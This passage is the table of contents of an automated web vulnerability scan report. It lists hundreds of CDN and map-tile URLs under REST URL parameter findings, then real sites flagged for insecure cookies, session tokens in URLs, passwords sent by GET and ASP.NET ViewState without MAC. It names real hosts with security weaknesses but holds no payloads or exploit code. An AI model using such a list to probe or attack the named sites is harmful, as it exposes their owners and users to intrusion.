8.78. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 2]

8.79. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 3]

8.80. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 4]

8.81. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1]

8.82. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2]

8.83. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3]

8.84. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1]

8.85. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2]

8.86. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3]

8.87. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4]

8.88. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1]

8.89. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2]

8.90. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3]

8.91. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 1]

8.92. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 2]

8.93. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 3]

8.94. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 4]

8.95. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1]

8.96. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2]

8.97. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3]

8.98. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1]

8.99. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2]

8.100. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3]

8.101. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4]

8.102. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 1]

8.103. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 2]

8.104. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 3]

8.105. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 4]

8.106. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 1]

8.107. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 2]

8.108. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 3]

8.109. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 4]

8.110. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 1]

8.111. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 2]

8.112. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 3]

8.113. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 4]

8.114. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 1]

8.115. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 2]

8.116. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 3]

8.117. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 4]

8.118. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 1]

8.119. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 2]

8.120. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 3]

8.121. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 4]

8.122. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 1]

8.123. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 2]

8.124. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 3]

8.125. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 4]

8.126. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 1]

8.127. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 2]

8.128. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 3]

8.129. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 4]

8.130. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 1]

8.131. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 2]

8.132. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 3]

8.133. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 4]

8.134. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 1]

8.135. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 2]

8.136. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 3]

8.137. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 4]

8.138. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 1]

8.139. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 2]

8.140. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 3]

8.141. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 4]

8.142. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 1]

8.143. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 2]

8.144. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 3]

8.145. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 4]

8.146. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 1]

8.147. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 2]

8.148. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 3]

8.149. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 4]

8.150. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 1]

8.151. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 2]

8.152. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 3]

8.153. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 4]

8.154. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 1]

8.155. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 2]

8.156. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 3]

8.157. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 4]

8.158. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 1]

8.159. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 2]

8.160. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 3]

8.161. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 4]

8.162. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 1]

8.163. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 2]

8.164. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 3]

8.165. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 4]

8.166. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 1]

8.167. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 2]

8.168. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 3]

8.169. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 4]

8.170. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 1]

8.171. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 2]

8.172. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 3]

8.173. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 4]

8.174. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 1]

8.175. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 2]

8.176. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 3]

8.177. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 4]

8.178. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 1]

8.179. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 2]

8.180. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 3]

8.181. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 4]

8.182. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 1]

8.183. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 2]

8.184. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 3]

8.185. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 4]

8.186. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 1]

8.187. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 2]

8.188. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 3]

8.189. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 4]

8.190. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 1]

8.191. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 2]

8.192. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 3]

8.193. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 4]

8.194. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 1]

8.195. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 2]

8.196. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 3]

8.197. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 4]

8.198. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 1]

8.199. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 2]

8.200. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 3]

8.201. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1]

8.202. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2]

8.203. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3]

8.204. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1]

8.205. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2]

8.206. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3]

8.207. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4]

8.208. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 1]

8.209. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 2]

8.210. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 3]

8.211. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 4]

8.212. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 1]

8.213. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 2]

8.214. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 3]

8.215. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 1]

8.216. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 2]

8.217. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 3]

8.218. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 1]

8.219. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 2]

8.220. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 3]

8.221. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1]

8.222. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2]

8.223. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3]

8.224. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1]

8.225. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2]

8.226. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3]

8.227. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4]

8.228. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 1]

8.229. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 2]

8.230. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 3]

8.231. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 4]

8.232. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 5]

8.233. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 6]

8.234. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 7]

8.235. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 1]

8.236. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 2]

8.237. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 3]

8.238. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 4]

8.239. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 5]

8.240. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 6]

8.241. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 7]

8.242. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 1]

8.243. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 2]

8.244. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 3]

8.245. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 4]

8.246. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 5]

8.247. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 6]

8.248. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 7]

8.249. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 1]

8.250. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 2]

8.251. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 3]

8.252. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 4]

8.253. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 5]

8.254. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 6]

8.255. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 7]

8.256. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 1]

8.257. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 2]

8.258. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 3]

8.259. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 4]

8.260. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 5]

8.261. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 6]

8.262. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 7]

8.263. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 1]

8.264. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 2]

8.265. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 3]

8.266. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 4]

8.267. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 5]

8.268. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 6]

8.269. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 7]

9. SSL cookie without secure flag set

9.1. https://signin.ebay.com/ws/eBayISAPI.dll

9.2. https://support.discoverbing.com/LTS/default.aspx

9.3. https://login.live.com/login.srf

9.4. https://ssl.bing.com/travel/secure/account/overview

9.5. https://support.discoverbing.com/Default.aspx

9.6. https://support.microsoft.com/oas/default.aspx

10. Session token in URL

10.1. http://api.brightcove.com/services/library

10.2. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

10.3. http://digg.com/ajax/tooltip/submit

10.4. http://l.sharethis.com/pview

10.5. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard

10.6. http://sales.liveperson.net/hc/21661174/

10.7. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard

10.8. http://wd.sharethis.com/api/sharer.php

10.9. http://www.facebook.com/extern/login_status.php

11. Password field submitted using GET method

11.1. http://digg.com/submit

11.2. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

12. ASP.NET ViewState without MAC enabled

12.1. http://umfcluj.ro/

12.2. http://umfcluj.ro/Detaliu.aspx

12.3. http://umfcluj.ro/contact.aspx

12.4. http://umfcluj.ro/en

12.5. http://umfcluj.ro/fr

12.6. http://umfcluj.ro/lista.aspx

12.7. http://umfcluj.ro/search.aspx

12.8. http://umfcluj.ro/sitemap.aspx

12.9. http://www.cesal.ro/

12.10. http://www.netlogiq.ro/

12.11. http://www.netlogiq.ro/Portofoliu-Web-Design.html

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/statuses/user_timeline.json

13.2. http://bing.fansnap.com/checkout/ajax_verify_availability

13.3. http://bing.fansnap.com/checkout/clickout/415814268

13.4. http://bing.fansnap.com/checkout/clickout/418563179

13.5. http://bing.fansnap.com/checkout/index/415814268

13.6. http://bing.fansnap.com/checkout/index/418563179

13.7. http://bing.fansnap.com/la/pi

13.8. http://bing.fansnap.com/la/seats-uet

13.9. http://bing.fansnap.com/seats/ajax/get_row_data

13.10. http://bing.fansnap.com/seats/ajax/get_summary_data

13.11. http://bing.fansnap.com/seats/ajax/get_tickets_data

13.12. http://bing.fansnap.com/seats/ajax/get_vfs_data

13.13. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

13.14. http://c.microsoft.com/trans_pixel.aspx

13.15. https://signin.ebay.com/ws/eBayISAPI.dll

13.16. http://t.mookie1.com/t/v1/event

13.17. http://www.fansnap.com/

13.18. http://www.fansnap.com/developers

13.19. http://www.fansnap.com/la/pi

13.20. http://www.stubhub.com/

13.21. http://a.netmng.com/hic/

13.22. http://a.tribalfusion.com/j.ad

13.23. http://admeld.adnxs.com/usersync

13.24. http://admeld.lucidmedia.com/clicksense/admeld/match

13.25. http://ads.revsci.net/adserver/ako

13.26. http://adx.adnxs.com/mapuid

13.27. http://api.choicestream.com/instr/api/8e360375d27a5381/a1

13.28. http://b.scorecardresearch.com/b

13.29. http://b.scorecardresearch.com/p

13.30. http://b.scorecardresearch.com/r

13.31. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

13.32. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr

13.33. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

13.34. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

13.35. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

